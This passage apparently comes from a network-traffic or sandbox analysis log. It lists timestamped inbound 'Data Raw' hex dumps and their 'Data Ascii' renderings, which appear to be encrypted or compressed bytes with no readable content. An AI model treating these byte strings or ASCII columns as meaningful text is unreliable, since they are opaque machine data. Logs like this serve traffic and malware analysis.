6e b6 8a a1 17 d6 f4 60 fc 96 29 d2 97 3d 88 e8 5a 94 c2 b3 cb 0e ce d7 3f ba 2e 67 09 ee bd ff 07 56 e7 42 0e 2c d3 5a 96 Data Ascii: PYaY `JM\|e})4ab6E0%6]46.l&)wF5A7lQ`9*T#wD'Wk]w,Wn&#,x37oO@44p\oEm-,lRR@Xa\nY.h$'=IFuU7n`)=Z?.gVB,Z
2021-12-15 13:13:48 UTC	54	IN	Data Raw: cf 6e 14 94 2c d8 67 5e 46 fc 78 14 b9 f6 83 e8 8d e6 9e 17 7f 0d 5b 31 cb d3 3f d6 a7 9c 7e bb a5 37 ca 67 ce 70 8d d0 05 2d eb 26 be 5b 26 dd b7 34 49 8e 98 65 55 09 d2 f6 c3 52 ec c8 8d 78 15 85 2d 2e ee a0 77 64 69 89 18 17 07 d6 20 d9 ef f0 e4 20 3a d0 15 53 3c 66 c5 e8 50 4a c0 76 27 08 a1 91 d0 7d be b5 15 d8 f3 23 a6 32 3b aa 53 cc 49 ed b9 8c 0f b7 12 25 ed e3 5d 9f 6b 3f 20 ad e3 57 a5 ad b4 f9 38 14 f4 cc be f1 05 06 c8 63 74 0b 04 50 c5 5d 60 e4 de 1b 6a d0 e8 d2 41 46 67 5c 50 81 e8 d1 95 e6 4e 1f 41 47 f2 49 31 83 78 35 8f d8 0b 3a 3d 63 af 3a 34 81 a6 61 0d b4 00 ed e1 2f 7d 76 97 2c 17 b3 2f 1c 5d f7 3b dd fb de a6 88 6e 85 ee e1 b6 c8 9f 64 95 93 8f 0f 74 d4 19 4e 20 21 a3 06 52 42 5b 5b bb c2 ce 80 6d aa 17 46 4b b5 5a 5e 24 cb 0f 0d 7b Data Ascii: n,g^Fx[1?~7gp-&[&4IeURx-.wdi :S<fPJv'}#2;SI%]k? W8ctP]`jAFg\PNAGI1x5:=c:4a/}v,/];ndtN !RB[[mFKZ^${
2021-12-15 13:13:48 UTC	55	IN	Data Raw: 7d 1d 7a a2 23 d6 7e a9 6d e4 37 dd f7 50 af a2 f8 1c dc 2b fa b8 06 60 7a 01 d7 d0 40 fb 1f a3 87 1d 85 64 ee 1a 0c 81 43 2b 9b 2a f3 7e 48 66 f8 c2 0d ff 3b f4 00 f8 79 64 73 b9 14 04 5d cb fb d6 c6 2c 93 ae 5c 95 90 0e b8 ec 9a 31 65 59 3e 26 95 1e 2d 7e 37 be 33 a3 d6 d2 8e 0d 2f 81 8a 4b 3d 0a 40 63 ef a5 93 00 e3 92 21 f3 16 41 ff 86 64 00 3f 2e cd 88 74 09 db 3c 2a 58 9c 5d ef 8a e9 68 5f 00 d0 e0 75 41 20 fa fb ab d4 48 56 f7 4b 29 3b f6 48 1c 09 26 7f 09 44 0f c2 df 0f 03 dc 39 53 e2 fc 10 45 01 f5 fa e8 79 70 e5 5c 74 5a 5d c1 1c 63 9b 04 5c 3a 5f 9a 0b ac 2f 23 a3 b0 25 78 1b 3d 2d 91 99 9d 45 3a e4 93 5f aa 6d 1d ba 40 2c 40 54 62 b3 9b 12 7d 31 4e e8 ba d5 55 45 55 4e f3 0d 58 63 69 b1 48 4c 27 cf ce 1c 7d c2 0e 16 dd ce 82 45 6c 52 33 4d d9 Data Ascii: }z#~m7P+`z@dC+~Hf;yds],\1eY>&-~73/K=@c!Ad?.t<X]h_uA HVK);H&D9SEyp\tZ]c\:_/#%x=-E:_m@,@Tb}1NUEUNXciHL'}ElR3M
2021-12-15 13:13:48 UTC	56	IN	Data Raw: e5 cc 4c 71 d6 6e 7e 71 1e b6 8f ed 5e ff c5 e5 ba fb e8 fe bc 23 d3 a0 89 1f 51 65 48 78 05 f1 c9 10 3e 34 32 a0 22 75 fc 83 51 2d e8 8b 40 07 fe 3e 65 8d df 15 f7 75 24 e8 de 7e 57 f9 68 a8 d6 3e 68 8f 6c 1d 1f cd a2 30 67 5f 34 30 93 cd d0 66 20 e1 28 e4 d0 92 21 45 80 60 31 90 6f 66 26 bd a3 4e ec b6 40 74 36 c0 a6 34 ef 0f 64 bb 07 d1 46 c6 70 13 44 26 5d 04 5a 22 bc 93 1d ed 77 2b 74 27 9f 57 63 6c 5c 77 e6 cd fa 71 66 dd 6e f5 7e a1 c4 76 68 f4 85 5f 0e c9 18 9a 0f 4b 2f 58 33 8a 75 92 f3 08 09 5b 6d e8 1f 38 cc b2 7f 84 a6 d7 a6 80 67 c5 63 de f1 19 95 32 d8 7f 18 96 9d 23 9d 32 a3 c9 8d e7 f4 d6 ea 94 d4 81 5d 05 fb 80 71 3d c4 2a 56 f7 d8 44 d8 b6 05 aa 43 ed e7 ed ff 05 d2 05 d7 f4 08 f8 c9 a2 37 99 16 02 30 d7 11 a8 4f 5e f2 cd d7 3f 05 1f 67 Data Ascii: Lqn~q^#QeHx>42"uQ-@>eu$~Wh>hl0g_40f (!E`1of&N@t64dFpD&]Z"w+t'Wcl\wqfn~vh_K/X3u[m8gc2#2]q=*VDC70O^?g
2021-12-15 13:13:48 UTC	58	IN	Data Raw: 18 52 c2 17 04 1c 63 12 5d fc a6 f2 ef 83 3c 42 2e e3 f6 db 05 c5 7d 68 5a 7a 1e e7 e8 f9 b0 b1 4b cf 97 a4 c0 0f 10 24 43 39 6d 0c 1b f5 86 2a 67 ce d9 aa 24 1d 14 7c c6 e2 c6 a4 c7 e2 ef 62 48 b8 6a 03 06 12 5b b8 d2 4c 85 67 29 b4 49 bc e7 06 7b a6 a3 2c da 10 1b 8c a3 c0 31 0e a2 69 0f 86 0d ce 17 35 57 c5 46 8d b4 4e da 24 a6 48 7d ca 41 57 8d 24 74 0e 5f 9d 4e 33 f4 43 c7 c4 a8 7a 0e d1 ac d8 fd 12 5f f6 88 1a 6d 71 4f 9f 6c e6 c0 4f 6e 1f 9f 32 f4 c0 72 97 0a ad e1 21 5e e8 02 c5 66 66 5a 1e 23 86 d1 63 5c e5 8d 22 a4 02 eb e8 bb 7d 44 ad f7 f4 b9 36 55 d0 f2 d2 ef 01 d8 f6 f1 3d 63 a7 68 98 d3 2d 84 00 1d c0 9a a8 1b f4 63 30 40 93 e4 d5 1a e9 99 2b 5e ff 93 36 84 38 8d 5f a9 6d 4d 94 85 65 c3 e5 6d 25 e8 de 5b 8b c9 da 7b 52 85 74 9d e9 4b 8b 34 Data Ascii: Rc]<B.}hZzK$C9m*g$\|bHj[Lg)I{,1i5WFN$H}AW$t_N3Cz_mqOlOn2r!^ffZ#c\"}D6U=ch-c0@+^68_mMem%[{RtK4
2021-12-15 13:13:48 UTC	59	IN	Data Raw: cd f2 f6 63 b3 3b ef 2c d8 67 e1 9a 37 da 96 0f 55 99 e9 33 72 2e 50 36 64 22 25 28 83 e3 f1 29 9d 71 b4 43 fc 2f 4d bd 91 92 eb 1d a6 87 4a b6 4d af e3 f1 7e c0 bb 86 24 f9 94 b8 1e fa 5b 7b 85 94 b1 fe 07 91 cf e1 e4 d7 da ab 2f 1a e2 9d 97 88 43 ab 3c 4b 11 b0 53 7d 4f 1d 57 3e e0 09 9f b8 8e a0 55 4d 16 79 85 66 7a 4c ae fe 46 4d 2e 26 e0 76 54 98 27 06 52 3e e4 ad 07 5c 33 81 5d 03 72 fa 78 09 f6 24 09 58 5d bf 56 37 90 29 e0 31 37 20 e0 75 41 fb 5e 74 6f d0 af d3 4d 6b 6d c4 89 c1 49 97 f5 41 38 ab 06 fa 1e 86 05 2d c7 89 6f 99 a0 cf 92 e2 90 eb 6e 0d 5f 65 0d 20 a7 c9 97 2e e8 9d 5e e6 0e c8 36 56 f5 26 28 e5 be b4 17 3e e9 9d 7a 48 f0 90 e7 a6 a3 57 92 88 ea ce a4 56 3e 72 24 17 40 f7 e6 39 43 4a 28 27 3c ef 26 1b 70 c3 34 3a cd 5d d5 24 d4 85 71 Data Ascii: c;,g7U3r.P6d"%()qC/MJM~$[{/C<KS}OW>UMyfzLFM.&vT'R>\3]rx$X]V7)17 uA^toMkmIA8-on_e .^6V&(>zHWV>r$@9CJ('<&p4:]$q
2021-12-15 13:13:48 UTC	60	IN	Data Raw: 63 3c 4c 04 6b cd bb bd 10 ea ad 3d 7b 95 92 dc 91 2b 3b f5 9d eb e5 d4 85 61 72 1e 03 30 0c 40 1f 02 aa 12 25 e5 65 51 95 cc b9 aa 36 c9 93 0c 05 f7 5f dd 8a 99 07 1f c4 68 58 cb 81 5b b9 09 72 73 ba 2c da 81 05 8e f3 3a 3c e8 23 15 c1 97 55 f7 da b6 67 d4 cc dd f9 22 18 99 4e 14 4e a3 9f 38 82 56 9b ff b9 7f 9f 5a 2a ad 66 29 b2 39 17 e7 b6 c3 60 2f 90 24 fd f5 5f 32 53 65 45 a5 39 15 97 26 24 d0 91 21 a1 63 6c 40 3f 61 db a7 d8 e3 a4 c2 94 ae 0c ed 9d 12 75 3c a3 46 4c 2d 25 2e 76 02 f4 8b b6 ce 65 17 1e 89 c2 a3 1d 48 09 ba 6d ae 01 5a a3 90 17 63 16 10 e0 aa 00 6a 5a 2b 78 f0 05 11 d8 18 a2 3b 25 61 a7 48 50 a2 53 62 cd 5c af ec 70 76 2e 17 e6 a6 c7 a2 77 83 46 dd 6c 2c af 09 7a 20 34 b2 65 ab bd 9d 65 6a b2 6e c9 16 4a 17 0b 9f 7f 0c be b2 0a f1 66 Data Ascii: c<Lk={+;ar0@%eQ6_hX[rs,:<#Ug"NN8VZ*f)9`/$_2SeE9&$!cl@?au<FL-%.veHmZcjZ+x;%aHPSb\pv.wFl,z 4eejnJf
2021-12-15 13:13:48 UTC	61	IN	Data Raw: 73 61 6d 9c 25 45 09 85 5f 9d b6 e1 07 1e db 3f 4d 4e 1c 09 8d 8d 9a b3 a6 f3 8c ea 98 c6 eb 9d 50 90 22 46 87 2c af 5c e9 65 b4 16 08 38 a1 3a 0d ab 04 b6 7a 1e 79 58 66 82 10 77 5f 09 45 9c e5 56 50 e1 80 f3 28 e7 26 e4 29 b0 89 cb 54 4a 46 5f b6 bc 0b e6 3e 37 36 29 82 96 11 ff 25 33 88 20 e8 41 ce 82 63 29 37 a4 5d a6 0c 6e 82 5d 98 74 47 e1 31 b9 06 29 4d e3 d3 f7 22 3d 67 e8 bf 38 c0 25 83 49 81 98 49 cb 69 df 1f 05 29 c8 5c e1 f7 68 58 d4 25 3c 69 28 8e 1f 4a 40 75 84 8f 1a bb d0 7f 57 f4 29 76 ef 9a 22 c6 34 89 dd aa 9b c9 f3 8a 37 e2 4d 67 a1 1a b5 8f 58 c2 eb e8 30 10 d3 e6 08 0b 50 d2 c4 ce bb d3 41 a8 62 b0 10 d5 2d e8 53 6f 06 23 6d a0 21 ff 04 25 61 11 5d 01 d5 b3 b2 45 21 82 fb 26 28 ec ef e3 16 ba 01 2a a1 92 5a 92 4e e1 98 8f 65 1e 8c 94 Data Ascii: sam%E_?MNP"F,\e8:zyXfw_EVP(&)TJF_>76)%3 Ac)7]n]tG1)M"=g8%IIi)\hX%<i(J@uW)v"47MgX0PAb-So#m!%a]E!&(*ZNe
2021-12-15 13:13:48 UTC	63	IN	Data Raw: ae b1 1a 06 94 02 40 b0 76 9e 81 d7 fb 9b bc 09 b1 bb 27 7e 72 6c 6f 6d b5 14 30 96 65 ab 1a 25 23 ac 29 a4 b2 1d d2 b6 aa 07 3b 4c 51 2f e2 95 98 94 f3 83 a9 42 f3 be fb 2f ca f1 0e c2 db b5 7a 0b 28 14 da 2a cf 65 c2 21 de 7a 79 55 9c c7 44 0c 2b 34 7b 0c 04 ed d6 27 fb de 32 15 18 7b 01 07 49 2d 76 bf a4 8e f5 97 75 a0 21 99 2a f5 10 a2 e2 2e 29 b8 8e 5b 81 b9 8e da 89 06 cb 34 df f7 9a 0a 7a 96 7b bc c0 7f 02 b8 64 00 9b 74 92 d5 37 63 db d7 4c 5e aa fc df 1e e9 e0 d9 73 e1 6b 20 c2 f7 24 f7 c1 d4 74 15 e0 c6 8f 3b 76 cb d8 4f fc e0 4e 97 d7 b2 7b 20 c5 93 97 82 78 31 3a 53 f8 cb fa bb d0 cc 69 e7 e2 2e e4 a9 54 63 10 c2 65 81 37 92 61 be 86 97 ef a0 c9 cc 11 7b 68 6f ff 79 c1 45 0d 56 3a ce ab 32 42 26 33 b1 fd 72 a9 d8 84 fd dd b5 bc a0 83 30 df 02 Data Ascii: @v'~rlom0e%#);LQ/B/z(e!zyUD+4{'2{I-vu!.)[4z{dt7cL^sk $t;vON{ x1:Si.Tce7a{hoyEV:2B&3r0
2021-12-15 13:13:48 UTC	64	IN	Data Raw: fb e5 1e 77 c9 da 93 48 f9 31 65 6e 8f 87 b1 45 0b ef 92 4b 3e d4 71 65 db 58 35 15 62 95 21 b6 73 f1 d6 5a 87 bf 34 ff 1e 28 87 a3 ee 26 ea d9 75 a0 89 17 28 06 85 51 04 72 0d 8f e7 13 a3 8f 56 62 78 cf dd 4a 6b b2 cb f5 d8 cb 20 71 0f 85 a3 fb 1e 6c f1 f5 ac 45 ec 25 81 c2 e5 5a b7 e4 ac 30 5d 76 69 98 b2 18 10 88 2c 00 a9 e9 a5 04 31 57 d9 b8 28 cf 31 6e 07 66 26 bd 70 ea 6c f3 b8 4c ba 1c 1b 11 af 5e 32 02 0e 1d 07 39 1a 98 ad 79 db 91 a2 5c 87 7c ca 7b eb cd c1 5b 58 da 93 84 2c 06 71 d5 12 75 ee 8d 86 1a 9c a1 c4 f5 c6 fc 8b b5 16 65 6c c8 e2 94 b3 90 4d 1f c2 6d a1 d5 73 71 13 d3 e4 ed e4 95 ba 09 e3 ea 7b f3 df 36 11 10 a5 0c 49 8f e7 f5 4e c6 74 97 5e c8 5c 50 8f 3d a9 ad d3 73 d4 3a d6 dd 6c 7e 33 2f 7e 7a db f1 6d a9 aa 0d 15 40 e1 f3 e3 8b f1 Data Ascii: wH1enEK>qeX5b!sZ4(&u(QrVbxJk qlE%Z0]vi,1W(1nf&plL^29y\\|{[X,quelMmsq{6INt^\P=s:l~3/~zm@
2021-12-15 13:13:48 UTC	65	IN	Data Raw: 95 ea 98 05 14 08 34 52 6a 89 c5 a1 59 a7 f4 97 84 50 4d 03 c9 7b 3e c8 e9 ec 6c 46 3a 8b 06 34 09 04 80 e7 c7 68 be d4 86 b4 68 14 62 58 c1 4a d1 0c a0 fc 36 bb 00 0b 54 59 52 d1 60 d6 16 5b 46 29 d9 fc f8 7e bb 4d 6f 9a d5 ce 1a cb d0 15 31 e9 fc d0 36 91 22 48 e7 4a eb d7 40 59 35 89 45 9e e8 d7 9e 9e 90 40 d9 f9 4b 86 e8 67 a3 2c 07 12 ff 81 cf c8 5b 8c 34 fc c9 54 55 98 8b d5 14 b4 d1 2e a2 c3 c6 55 a2 b2 07 cf ff 83 96 6f 8b 8d 18 55 34 e1 dc 79 3e 49 ed 09 9a 54 be cc ad 78 5f a0 3e 1f 32 2c 8c 19 37 f7 b8 da 91 d4 42 fc 7d a2 24 15 39 72 e1 ac 08 c4 00 f9 8e 5c be d9 66 e1 95 6f 36 e5 1a 31 b4 8e 5d e8 bb c3 5f 01 42 f4 3a 71 8d 47 d9 ad c2 11 ce bc 32 2f 35 cc ab 25 8d a6 d8 01 de 00 87 62 b9 2e f8 87 5d 51 e5 ad d4 bf 7e 7e 6f 39 10 da 88 ed c2 Data Ascii: 4RjYPM{>lF:4hhbXJ6TYR`[F)~Mo16"HJ@Y5E@Kg,[4TU.UoU4y>ITx_>2,7B}$9r\fo61]_B:qG2/5%b.]Q~~o9
2021-12-15 13:13:48 UTC	66	IN	Data Raw: 39 9b 3f 73 32 aa ae 6e 76 50 9a f2 20 a7 c5 27 93 62 4e 6d c9 50 1e 97 bf d0 f1 a8 da 35 ce 9f 50 2c 91 ff e9 b7 47 82 ee e1 aa 6d f4 7e 22 5e 58 4a 23 24 ce 18 0a 48 4b 3d b9 5e 8d 1b 37 74 cd 31 38 46 05 72 df b2 9a 33 b0 13 cb 5d 23 48 03 e5 53 56 b5 62 04 2f d8 fb 33 6f dc e9 00 50 93 ca 8b ea 03 87 24 2d e8 1d 32 32 44 71 f0 d9 be 61 6e 2e fb 6f 0c 8a 53 14 e9 43 cb 97 be 1a c1 6c 0c 0c c0 12 72 98 31 e5 cf b5 39 53 b9 ab b3 6b e9 19 b3 e1 71 be 4f b5 20 c9 84 d9 d1 30 c1 c8 99 2f 84 28 06 e4 ee cc f4 67 3c 0e 1b 4c 8c 33 95 98 65 8f 69 cf f3 a1 67 00 ab 99 6a 51 e3 0d c3 97 ea 6a 7a aa 67 e8 32 b5 c8 8b f1 23 08 ea 2b ec c7 73 b6 05 97 ec 5c e1 24 21 ed 06 5f 9f 6b 85 fc ca c5 54 09 ba df f2 01 bb 77 08 27 ff 25 f4 38 1e fd e3 f9 e1 af 66 b5 c8 f9 Data Ascii: 9?s2nvP 'bNmP5P,Gm~"^XJ#$HK=^7t18Fr3]#HSVb/3oP$-22Dqan.oSClr19SkqO 0/(g<L3eigjQjzg2#+s\$!_kTw'%8f
2021-12-15 13:13:48 UTC	67	IN	Data Raw: f6 08 09 d3 6e e8 1f 38 72 08 d6 7d 59 a5 a0 35 66 6b 17 10 3d d0 51 aa f5 58 e7 1d df 2d 10 b7 cf 52 fb 8c e1 7f ff bd d7 14 a2 05 e9 40 26 c2 3b 12 df 7b 20 b9 75 8e 11 ba 62 37 e7 ed 9a 64 54 af d7 79 e5 8c 36 5d c8 a2 fa e3 e5 d7 41 2a a2 9e f1 9e 02 13 44 27 de f9 d5 7c c8 fa f8 f0 ce 55 f2 34 d9 52 0b 2f 89 ae f7 45 ad 43 10 56 f2 21 72 18 90 91 59 16 ef e3 22 30 2c 2e ae e8 81 04 9c 62 93 96 7d 4a 82 1d f2 7e c0 eb e0 a6 8b 52 47 95 a1 6c a1 e8 c1 e6 01 f8 fa a0 25 6f 9a a5 91 1c 89 9c 48 d9 e6 09 ab 95 90 0e b8 ed 7d b2 b7 57 b5 f3 77 fa 18 d4 5d aa 31 80 39 8d d0 56 5b b4 5c 06 2a 57 74 d4 12 44 50 3e 0d 8b e4 b6 15 2b 82 54 64 04 c0 ff 44 48 a7 5f 8c 69 db f0 84 cc be d5 e9 69 9c 3a 67 a5 b3 43 e3 84 7e ee 1a ab 02 da 12 d5 ed ff 0d c6 09 2a fb Data Ascii: n8r}Y5fk=QX-R@&;{ ub7dTy6]AD'\|U4R/ECV!rY"0,.b}J~RGl%oH}Ww]19V[\WtDP>+TdDH_ii:gC~*
2021-12-15 13:13:48 UTC	69	IN	Data Raw: 5e bf ef e7 28 9d a3 1a a2 0b fa 00 eb 63 ce 9d 3c 9f 57 ff 3a f2 21 e1 5c 59 7b 3d 30 8a 46 6d ee 5a b0 c7 65 c6 22 5d de 8b 09 41 76 2a 9e 66 10 0c 27 7a 4b 0b 14 7e 84 44 9b 02 60 26 45 2a a1 6d d5 b9 cb 99 93 0c a1 34 d6 71 5c af 64 b0 7b 38 42 63 32 64 0e 83 dc a9 47 6b 46 c8 fa c0 79 55 d3 0f d4 54 9b e1 5d be 2e e9 e7 d9 fa e7 5e 8b e1 eb 0f 87 d1 fe 7f f7 59 25 71 64 51 95 9b 01 ec d3 3a 6c 7e 13 5f a8 af f8 5b fb b2 d3 b9 06 5e 79 28 cb 9a df 73 96 28 d8 61 d7 26 81 10 73 8b f3 c0 b3 0c fa e1 7e 60 98 a1 30 ca 88 c6 02 12 88 c8 ed 6d f1 78 d1 08 92 4c 6c 83 60 26 06 ee 30 ce d6 d8 e9 18 35 84 06 bc dd d7 f4 62 f6 ce ac 19 6b e8 c6 4f 1b ab e5 a5 5a 29 8a bf 3e b0 ee 67 84 f9 eb a0 81 6d 71 fc 4b be da a3 75 a3 7d d1 82 2c 50 57 23 89 18 89 24 12 Data Ascii: ^(c<W:!\Y{=0FmZe"]Avf'zK~D`&Em4q\d{8Bc2dGkFyUT].^Y%qdQ:l~_[^y(s(a&s~`0mxLl`&05bkOZ)>gmqKu},PW#$
2021-12-15 13:13:48 UTC	70	IN	Data Raw: 5c 41 82 05 01 bc be 8b f9 a0 92 5f 7c 10 2c 3c 07 48 3e c8 3e 9a e2 9a f2 fd e8 24 41 a0 50 be 6a 63 d4 76 e0 52 c4 f5 28 e5 63 96 28 7d 45 6f fc be 84 e1 e7 ae bd 51 92 88 eb 40 52 1d d2 89 56 a4 a8 ef 16 b4 d6 31 a0 d0 a9 bc 1a fb 80 9d d8 c1 b1 66 97 92 c6 a6 db 38 65 72 4d a0 0d a4 f8 4a c3 ec 18 52 70 48 82 3e 09 24 d0 ad cf 08 c0 83 38 14 a0 62 d0 2f ed 72 27 87 2c 77 4b e1 bf 11 ad fa 52 bb eb 9f 63 c8 d4 2a 93 7f 70 85 44 b2 d0 7a 8f f6 b9 9d 5d dd 6d fc 47 c3 6c 95 5e 73 60 df 23 6c 9e 55 35 5f 64 7e d0 29 d7 6a 78 d2 43 3d 5b ed 0c 27 2e 69 a9 15 9a 8a 3a 33 a4 f0 a1 0c 43 89 5d 98 72 55 dc d6 42 f9 5d 40 53 dc a5 ca 5c 38 17 bf b3 ed 64 59 34 a9 c0 b6 34 b8 48 59 ee 4a 0e d1 64 98 57 87 a0 f7 30 7c 0a d3 4f 1c 25 7a 00 63 e1 c7 eb f4 cc ae 23 Data Ascii: \A_\|,<H>>$APjcvR(c(}EoQ@RV1f8erMJRpH>$8b/r',wKRc*pDz]mGl^s`#lU5_d~)jxC=['.i:3C]rUB]@S\8dY44HYJdW0\|O%zc#
2021-12-15 13:13:48 UTC	71	IN	Data Raw: c8 e2 0f 1e 17 ec 9e 5c e2 34 27 db 85 19 1e 8c a3 1b 81 e4 62 24 e0 cf 84 f1 08 c3 71 3a 3a 9c d0 70 c1 94 32 9b 39 18 96 a4 bb 81 bf ef af 06 f8 37 2a 1d 6b 2b ba d0 dd e0 7e 8b d5 bc e4 db 7a ab 37 23 43 54 42 ef 23 a6 6e b6 9e ac 47 a1 6f 60 fc 43 24 33 c0 fe e2 b5 3f 4b 5c 4f 34 7a d3 7d 86 73 0c ce 7f e5 38 f5 fb a9 f0 bb 2e 0d cb d9 52 17 f5 17 62 f2 2f ed a8 6c 56 42 80 e2 c1 82 10 59 ba 66 32 56 f6 7e cc 51 10 2e a9 f7 83 25 1d 85 06 41 e1 f9 7e c0 bb e3 b0 95 69 47 6a e6 c1 a3 03 a4 1a 88 7e 71 6e 2d e4 3f 36 1e d8 8f 10 0e 6b 47 a8 ec c2 1b 7b b0 e0 1e 6b 40 94 ea fe 12 d2 76 f5 b8 f7 71 be 21 35 6e 25 3f 7d 6d 70 79 6f 74 7e 64 27 30 53 15 d1 a7 d3 cd 91 88 cd 68 33 00 a8 1f 88 f0 09 db 0c 6f 5d bf 7a 3a 9a ef a5 0b f8 dd 3b fc 8f 75 c7 b2 7c Data Ascii: \4'b$q::p297*k+~z7#CTB#nGo`C$3?K\O4z}s8.Rb/lVBYf2V~Q.%A~iGj~qn-?6kG{k@vq!5n%?}mpyot~d'0Sh3o]z:;u\|
2021-12-15 13:13:48 UTC	72	IN	Data Raw: 29 0c d5 0a c8 65 0e 0a 04 50 2a a6 39 88 43 67 6a d0 e0 22 c9 4a 68 d8 90 ea e8 bb 16 c9 29 f7 fb be 74 48 5b bf ad c0 63 30 ef c2 41 62 24 ac 1b d0 b6 32 d0 5b 4c 79 1e 82 7a f4 0f 3b 17 e4 ad 6d f2 81 81 56 d7 04 5f 48 1b 2c ab 5a c2 53 19 c0 ec 82 d4 a2 f3 42 10 1e 77 c8 da 7b 52 1d 6f ee 08 16 48 6f 42 83 6b 4c 4b 3e d5 fa 28 cb 50 03 9a 86 c8 e2 51 f5 f7 9b d7 d9 87 0d a8 7b 93 5c 0c 40 1f 02 76 59 8c 77 65 51 3b 9f b9 7a 6b c9 93 d2 1d 0e a8 db 8a 0c 55 1a c4 b8 7e 34 7e 5b b1 6d 74 73 ba f2 cd 75 f7 42 7e 64 bb 46 86 59 73 90 8f 6c 1d ed c9 a2 30 67 67 62 9b 5d f5 55 a6 2f 64 86 82 59 1f 89 33 3a 67 54 19 45 37 ad 78 15 7c 18 3b d5 b2 c9 6f d4 2b b7 a1 e3 d0 22 2f 3c f9 15 96 a2 25 d0 91 29 8a bf e7 09 97 cd 24 77 5b a4 de 65 6c c5 fd 62 76 11 f8 Data Ascii: )eP*9Cgj"Jh)tH[c0Ab$2[Lyz;mV_H,ZSBw{RoHoBkLK>(PQ{\@vYweQ;zkU~4~[mtsuB~dFYsl0ggb]U/dY3:gTE7x\|;o+"/<%)$w[elbv
2021-12-15 13:13:48 UTC	74	IN	Data Raw: b2 17 5d 67 a9 81 de 62 b2 33 be 95 2a 59 d8 f4 12 72 53 9f f0 83 27 3f f6 6b e0 e5 11 ae ad 3d ad 46 b9 9f 5c b7 61 63 06 59 e3 5c 92 87 36 98 df e5 dd d0 90 28 22 70 49 77 bd 0d 91 38 fb 08 e2 6a 57 53 6d 28 e7 db 26 af 98 58 fb fc cd 87 b0 57 d1 b8 d9 a7 1f 86 59 09 83 79 6d f3 7f a6 fd 9a ca 6a 96 db 38 71 29 4d 68 f7 ed 42 49 62 28 08 38 b6 80 e3 64 f4 fb 2f 00 a9 a9 07 84 fa 14 c6 68 59 df 88 d2 fc 00 2e 03 c9 bf be 11 30 d7 ad 44 e5 de 3b 36 eb 85 4e 12 76 ed bb 4d 04 ee 73 4d e2 8b 52 d2 eb 46 54 c7 c0 3d ee 7e 35 03 9e d4 58 dc b9 97 65 7b 7d 3e 9a 44 fd aa 3d 06 b4 be 24 46 36 2c 51 2f 17 6d c3 45 d6 77 0d 1b b5 7b 0b 70 af eb 99 3a d3 06 c8 c2 1a 4d 8f df aa 67 45 e9 b3 68 9c 33 f6 59 62 3d ec b8 48 65 68 51 51 d8 63 74 ac 78 da 5f 14 ea 5a 34 Data Ascii: ]gb3*YrS'?k=F\acY\6("pIw8jWSm(&XWYymj8q)MhBIb(8d/hY.0D;6NvMsMRFT=~5Xe{}>D=$F6,Q/mEw{p:MgEh3Yb=HehQQctx_Z4
2021-12-15 13:13:48 UTC	75	IN	Data Raw: 12 b2 fa 61 0b 4c 50 a1 03 33 c2 ce 08 c1 e2 03 91 df ad 4b e6 db 42 32 40 0b 28 c0 42 64 d5 b7 b0 68 45 e0 62 c1 02 29 2b 0b 9a fd d9 f5 0f 5d cd da 6d 2e 55 3a ae 3a 33 bb e6 1d 62 fa f4 98 d0 ed 23 e1 5d 88 78 2c db 3d 2c 18 57 7a 20 32 a9 4d 5e 42 62 5d e1 60 37 4a ae fe 3f d4 ec fc c8 29 b1 ce f4 e2 e5 bd 11 4f 1a bc a3 ce 69 b9 e0 cc 98 7b 2e b8 ae 13 5c 96 13 e6 79 a2 5e 9c 0f aa 23 da f0 ef ec 2e 3f d7 a7 dd 76 18 2f 52 4c 7a 12 4b 35 b8 f4 c6 51 9b f0 ff 15 a6 87 1e 45 8c 41 ed f9 7e c0 81 0b 24 4e b9 17 b0 43 13 62 00 64 c1 54 28 fa a0 6d b6 3f e3 58 27 70 90 0a fc dc f2 55 45 13 71 b0 bb 18 cb e5 07 3e e5 35 78 2d 14 5d c0 b2 c9 64 22 df 86 98 49 6b c5 04 53 a8 31 34 75 e0 18 f6 d6 18 e2 9e c7 88 f5 98 8b f9 74 26 80 7f 48 df 59 de 99 2a 93 62 Data Ascii: aLP3KB2@(BdhEb)+]m.U::3b#]x,=,Wz 2M^Bb]`7J?)Oi{.\y^#.?v/RLzK5QEA~$NCbdT(m?X'pUEq>5x-]d"IkS14ut&HY*b
2021-12-15 13:13:48 UTC	76	IN	Data Raw: 13 35 ca c7 a7 72 9f 8f 1a 38 9f 32 00 c0 3f ad e2 e3 c5 ac 0b 54 3a af 0c 36 5f 8f 8e b2 f4 63 5c 8f 75 ea d1 41 14 17 44 ff b7 48 7e b3 22 34 cc 1b 40 d1 41 57 d8 4e c1 3d 63 a9 39 d0 72 59 9e 37 dc 52 6f 61 ee 2a 9e 83 d4 57 4c ba de 5b 28 96 46 92 ef 25 03 b6 85 ee 99 63 98 16 44 18 93 8f 65 1c c4 90 6e 32 a3 da 11 52 11 67 8d 6b 6f 8b 34 ed b0 a7 94 5a 54 d4 90 28 98 59 d4 56 7f 7d 52 1f f5 9d f7 e2 05 a7 96 95 93 04 cf a0 e9 fc 45 db 3c c0 ad 9a ae e9 08 6d 87 ce c9 1a c6 b4 ef e0 a1 0a f7 07 39 16 6b f4 c3 81 a2 00 e6 f2 80 45 d5 b3 1e 2b ce 7e 10 18 83 d1 c0 3e 1c fc 62 f7 fd 30 29 d3 b6 e7 ae 18 ed db 53 19 00 e1 5c 92 dc df ad b4 20 c1 61 55 b9 66 26 6d ae f3 ba 75 1f 40 04 50 70 f2 02 03 f1 8d c8 fe 99 a5 b7 4e 7b 60 c6 a0 49 8a c8 80 ce 57 5f Data Ascii: 5r82?T:6_c\uADH~"4@AWN=c9rY7Roa*WL[(F%cDen2Rgko4ZT(YV}RE<m9kE+~>b0)S\ aUf&mu@PpN{`IW_
